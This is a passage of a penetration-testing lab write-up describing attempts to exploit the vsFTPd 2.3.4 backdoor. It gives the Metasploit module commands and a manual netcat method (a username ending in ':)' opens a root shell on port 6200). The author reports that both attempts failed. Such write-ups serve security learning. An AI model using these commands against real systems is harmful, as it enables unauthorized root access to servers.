FTP

  • Since I found that the FTP version had an exploit available, I went over to Metasploit to try to use it.

msfconsole
search vsFTPd 2.3.4

  • Looks like there is an excellent exploit available so let's give it a try.

use exploit/unix/ftp/vsftpd_234_backdoor
show options
set rhosts [Target IP]
exploit

  • Unfortunately, a session was not created for some reason.

  • I then attempted to try the exploit out manually.

  • From your host terminal run the following.

nc [Target IP] 21
user [Type whatever username you want]:)
pass [Type whatever password you want]

  • This exploit is actually a backdoor built into this version of FTP. All you have to do is add the smiley face at the end of the username you put in and it will allow you access.

  • This has FTP open new port access on Port 6200.

  • As soon as you are done doing the above then open a new terminal and run the following.

nc [Target IP] 6200

  • It should take a little while but you should be able to then have root privileges to the account.

  • Unfortunately, I couldn't get this to work either for some reason. I even reset the machine and tried on Parrot. No luck either way.

PreviousExploitationNextSamba

Last updated